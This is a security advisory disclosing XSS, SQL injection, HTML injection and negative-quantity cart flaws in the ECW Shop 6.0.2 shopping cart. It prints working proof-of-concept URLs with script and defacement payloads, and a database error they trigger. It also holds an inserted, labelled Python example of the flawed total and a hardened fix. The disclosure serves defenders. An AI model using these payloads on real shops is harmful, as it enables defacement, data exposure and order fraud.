[NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities
Hello All,
I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2
Authors Site: http://www.soft4e.com/
ECW Shop is described by its authors as:
ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.
+-[Examples:]--------------------------------------------------+
[1]------------------------------------------------------------+
XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script>
[2]------------------------------------------------------------+
Information Disclosure & Possible SQL Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='
Error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/search.php on line 109
[3]------------------------------------------------------------+
HTML Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1
[4]------------------------------------------------------------+
Cart/Order Manipulation:
You can add negative quantity value items to your cart to gain credit.
Example:
Add '-1' of an item with a value of £4.99
Add '1' of an item with a value of £6.99
Cart Total: £2.00
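A defender-side illustration of the negative-quantity flaw beside a server-side fix, added here and not taken from the advisory or from ECW Shop's own code; the two-item catalogue (priced £4.99 and £6.99 as in the advisory), the MAX_QTY cap and the function names are constructed assumptions:

```python
from decimal import Decimal, ROUND_HALF_UP

# Constructed catalogue for the demonstration; prices mirror the advisory's example.
CATALOGUE = {"A": Decimal("4.99"), "B": Decimal("6.99")}
MAX_QTY = 99  # hypothetical per-line cap; choose one that fits the shop

def cart_total_unchecked(lines):
    """Vulnerable form: trusts the client-supplied quantity, so a negative
    quantity subtracts from the total (the behaviour the advisory describes)."""
    total = Decimal("0")
    for sku, qty in lines:
        total += CATALOGUE[sku] * int(qty)
    return total.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)

def parse_quantity(raw):
    """Hardened form: accept only a plain positive integer within the cap.
    Rejecting instead of clamping keeps the tampering visible in the logs."""
    s = str(raw).strip()
    if not s.isdigit():          # rejects '-1', '+1', '1.5', '', '1e3'
        raise ValueError(f"invalid quantity {raw!r}")
    qty = int(s)
    if not 1 <= qty <= MAX_QTY:
        raise ValueError(f"quantity {qty} out of range")
    return qty

def cart_total_checked(lines):
    """Server-side total: prices come from the catalogue (never from the client)
    and every quantity is validated before it touches the sum."""
    total = Decimal("0")
    for sku, qty in lines:
        if sku not in CATALOGUE:
            raise ValueError(f"unknown item {sku!r}")
        total += CATALOGUE[sku] * parse_quantity(qty)
    return total.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)

def tamper_detected(lines):
    """True when the hardened path refuses the cart (what a handler should log)."""
    try:
        cart_total_checked(lines)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    tampered = [("A", "-1"), ("B", "1")]    # the advisory's example cart
    print(cart_total_unchecked(tampered))   # 2.00: credit gained
    print(tamper_detected(tampered))        # True: rejected server-side
```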
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE
JohnC@xxxxxxxxxxx
http://www.NoBytes.com